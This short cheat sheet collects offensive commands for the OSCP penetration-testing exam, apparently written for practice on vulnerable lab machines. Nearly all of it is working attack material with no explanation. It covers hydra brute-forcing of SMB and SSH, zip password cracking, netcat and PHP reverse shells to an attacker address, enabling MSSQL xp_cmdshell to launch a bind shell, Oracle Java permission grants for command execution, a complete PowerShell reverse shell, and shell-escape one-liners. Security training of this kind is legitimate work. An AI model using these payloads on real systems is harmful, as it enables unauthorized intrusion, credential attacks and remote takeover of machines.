This cheat sheet is the compilation of commands to exploit the vulnerable machines. The commands below may not be enough for you to obtain your Offensive Security Certified Professional (OSCP).
hydra -L <user_dict> -P <pwd_dict> 192.168.56.1 smb
hydra -L <user_dict> -P <pwd_dict> 192.168.56.1 ssh
fcrackzip -u -D -p <dictionary_file> <zip_file>
import subprocess
subprocess.check_output(['whoami'])
import os
import sys
os.system('nc -e /bin/bash <attacker_ip> 8099')
<?php passthru("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc <attacker_ip_address> 8099 > /tmp/f"); ?>
EXEC SP_CONFIGURE N'show advanced options', 1
go
EXEC SP_CONFIGURE N'xp_cmdshell', 1
go
RECONFIGURE
go
xp_cmdshell 'cd C:\<path_to_bind_shell>\ & <bind_shell_name>.exe';
go
exec dbms_java.grant_permission( 'SYSTEM','SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute');
begin
dbms_java.grant_permission
('SYSTEM',
'java.io.FilePermission',
'<<ALL FILES>>',
'execute');
dbms_java.grant_permission
('SYSTEM',
'java.lang.RuntimePermission',
'*',
'writeFileDescriptor' );
end;
exec javacmd('<command>');
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.56.101',8099);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
which python
which bash
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
/usr/bin/perl -e 'exec "/bin/sh"'
:set shell=/bin/bash
:shell
awk 'BEGIN {system("/bin/sh")}'
rdesktop -u <username> -p <password> -r disk:tmp=~/Desktop 127.0.0.1:8080